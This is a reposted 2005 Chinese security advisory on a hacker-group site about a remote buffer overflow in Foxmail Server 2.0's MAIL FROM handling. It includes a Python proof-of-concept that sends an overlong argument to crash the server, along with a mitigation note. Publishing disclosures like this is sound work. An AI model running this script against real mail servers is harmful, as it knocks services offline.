| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 新闻中心 >> 漏洞公告 >> 文章正文 用户登录 新用户注册
  Foxmail Server远程缓冲区溢出漏洞         ★★★ 【字体:
Foxmail Server远程缓冲区溢出漏洞
作者:未知    文章来源:http://www.nsfocus.net/    点击数:    更新时间:2005-2-14    

受影响系统:
BODA Foxmail server for windows version 2.0
描述:
--------------------------------------------------------------------------------
Foxmail Server是博大互联开发的邮件服务器软件。

Foxmail Server在处理"MAIL FROM:"命令时缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击或者以进程权限执行任意指令。

攻击者提交包含超长参数的"MAIL FROM:"命令给Foxmail server处理,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。

<*来源:Xin Ouyang (xouyang@fortinet.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110763204301080&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Xin Ouyang (xouyang@fortinet.com)提供了如下测试方法:

#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt


def usage():
    print "Usage: foxserver.py -h host -p port"
    sys.exit(0)
    
if __name__ == '__main__':
    
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:p:")
    except getopt.GetoptError, msg:
        print msg
        usage()
        
    for o,a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)

    evilbuf =  "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
    evilbuf += "RCPT-TO: postmaster@company.mailDATA" + "\r\n"
    evilbuf += "Message-ID: 123" + "\r\n"
    evilbuf += "ASDF" + "\r\n"
    evilbuf += "." + "\r\n"
    evilbuf += "QUIT" + "\r\n"
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send("HELO localhost\r\n")
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send(evilbuf)
    except socket.error, msg:
        print msg
        
    sockfd.close()

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 禁止不可信IP访问FoxMail Server

厂商补丁:

BODA
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.foxmail.com.cn/english/english_3.htm
文章录入:IceRiver    责任编辑:IceRiver 
  • 上一篇文章:

  • 下一篇文章:
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    谷歌列举微软OOXML文档标准不
    补丁无济于事 Firefox仍面临
    HP-UX get_system_info的工具
    密码管理AI RoboForm Pro具有
    FireFox 3.0将增加两项安全功
    Firefox浏览器要改桌面图标 
    NSFOCUS 2007年07月之十大安
    irefox/Thunderbird/SeaMonk
    傲游可能推FireFox内核浏览器
    Mozilla Firefox 2.0.0.4浏览
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.